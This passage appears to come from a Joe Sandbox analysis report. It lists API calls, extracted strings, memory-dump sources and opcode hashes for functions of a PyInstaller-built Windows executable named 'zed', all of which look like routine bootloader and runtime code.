                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
                                                                                                                                                                                                                                                • Instruction ID: 543dcd35251ecf0e4c9853e2eeef9308669887e1d84bb22d85ce928d327f55f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D418725A2864A46EA10EB21D9603B5E390EF64F8CFC4443BED4D87B96DE3CE5418722
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                • Instruction ID: fbddcabee7792a1c9c904cd2b231a62280e90fd3ab35c38a4ceef666baf8cb7b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFD1A432A187498AEB20EB65D4503ADB7A0FB64B8CF90013BDE4D97B55CF38E085D712
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7E531F0AA,?,?,000002B961E35F48,00007FF7E531AD53,?,?,?,00007FF7E531AC4A,?,?,?,00007FF7E5315F3E), ref: 00007FF7E531EE8C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7E531F0AA,?,?,000002B961E35F48,00007FF7E531AD53,?,?,?,00007FF7E531AC4A,?,?,?,00007FF7E5315F3E), ref: 00007FF7E531EE98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                • Instruction ID: 586741f92911d05852436d0845730a3abe847c61770fa919c84d774714bbe40d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE412A21B29A0A41EA15EB229920775A795BF24FD8FC4413FDC1DC7384EF3DE445A326
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E5303706,?,00007FF7E5303804), ref: 00007FF7E5302C9E
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E5303706,?,00007FF7E5303804), ref: 00007FF7E5302D63
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF7E5302D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                • Instruction ID: 4ad70daf7e9917a788d1aff4988bde7676a8c691b381dc2ffc3cec7e84d77fa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7431D626718B4942E620BB25A8203ABA695BF98F9CF80013BEF4DD3759DE3CD546C711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E530DF7A,?,?,?,00007FF7E530DC6C,?,?,?,00007FF7E530D869), ref: 00007FF7E530DD4D
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7E530DF7A,?,?,?,00007FF7E530DC6C,?,?,?,00007FF7E530D869), ref: 00007FF7E530DD5B
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E530DF7A,?,?,?,00007FF7E530DC6C,?,?,?,00007FF7E530D869), ref: 00007FF7E530DD85
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7E530DF7A,?,?,?,00007FF7E530DC6C,?,?,?,00007FF7E530D869), ref: 00007FF7E530DDF3
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7E530DF7A,?,?,?,00007FF7E530DC6C,?,?,?,00007FF7E530D869), ref: 00007FF7E530DDFF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                • Instruction ID: a9bbd5dd43bfc0c5e2959923a19516110f1fd189b4e422e3660b04c6ceb98a4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A931C761B2AB09D1EE12AB069420775A3D4FF64FADFD9493ADD1D86380DF3CE4458322
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                • Opcode ID: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                                                                                                                • Instruction ID: ab7860a81b8316d51ff06cc8981ac98030639b3514fec505915973c849089fec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74418621A28B8E91EA11EB14E4243E9A311FF64B5CFD0013BEA5DC3695EF3CE515C762
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7E530351A,?,00000000,00007FF7E5303F23), ref: 00007FF7E5302AA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                • Instruction ID: 66861ed3e61d61aefca2308ebd17acc69bf491ea3be8d06d915a22c5d01a9961
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09219732628B8542E720EB51F8617D6A354FB98BC8F80013BFE8D83659DF7CD1458751
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                                • Instruction ID: ce9af814a2a5f50f19faec012f1bd95a8e545e964ff3f0801a41a4263148aeca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E212A24E2864A81F55573719B71339D2425F64FB8F85463ED93ECB6C6DE3CA4409322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                • Instruction ID: d942c59b25472b5b6ec9fa24d9bf15d64d6aafade11f6699607f41cea2303b57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E119A21728F4986E7509B12E864329E3A4FB68FE8F44423AE95DC77A4DF3CD8148751
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7E5303FB1), ref: 00007FF7E5308EFD
                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7E5303FB1), ref: 00007FF7E5308F5A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5309390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E53045F4,00000000,00007FF7E5301985), ref: 00007FF7E53093C9
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E5303FB1), ref: 00007FF7E5308FE5
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E5303FB1), ref: 00007FF7E5309044
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E5303FB1), ref: 00007FF7E5309055
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E5303FB1), ref: 00007FF7E530906A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                • Instruction ID: b7012ddbbfd5b7be8f6fb0e4da9409889aaf59ff538080d105750af56dad6294
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D418862A2978981EA30AB12A5203B6F395FB95F8CF84413AEF4D97795DE3CD500C721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A,?,?,?,?,00007FF7E531718F), ref: 00007FF7E531B2D7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A,?,?,?,?,00007FF7E531718F), ref: 00007FF7E531B30D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A,?,?,?,?,00007FF7E531718F), ref: 00007FF7E531B33A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A,?,?,?,?,00007FF7E531718F), ref: 00007FF7E531B34B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A,?,?,?,?,00007FF7E531718F), ref: 00007FF7E531B35C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A,?,?,?,?,00007FF7E531718F), ref: 00007FF7E531B377
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                                • Instruction ID: c3514133b0eb5a9b9fec51bc769276aeeb98dfe6059fae50218a1e562ffbeed7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16114C24E2C64A82F6547371977133DD2429F64FB8F844A3ED82EC76D6DE3CA4519322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E5301B6A), ref: 00007FF7E530295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                • Instruction ID: 6976e5056e728de371ed13f2aaabd84584a1c4e0944841dbfce4b6ad32c9aa63
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B31E922B28B8952E720B765A8603E6A294BF94BDCF80013BFE8DC3745DF7CD1468711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                • Instruction ID: 70d887725c4f358536838a267aa08532a4c4d3b5aafed150452aa528afaea505
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A316676A29A8585E720EB21E8653F9A350FF94B8CF84013AEA4D87B59DF3CD105C711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7E530918F,?,00007FF7E5303C55), ref: 00007FF7E5302BA0
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF7E5302C2A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
